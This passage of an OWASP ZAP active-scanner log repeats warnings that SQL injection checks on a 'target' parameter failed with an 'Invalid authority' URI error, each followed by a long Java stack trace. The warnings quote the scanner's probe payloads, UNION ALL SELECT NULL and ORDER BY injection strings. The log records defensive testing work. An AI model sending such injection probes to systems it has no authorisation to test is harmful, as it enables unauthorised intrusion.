org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685584 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685585 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685586 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685588 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) ORDER BY 2221#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685589 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685591 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685593 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685594 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685596 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685597 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685598 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685599 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685600 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685602 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685604 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685612 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP ORDER BY 5074#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at 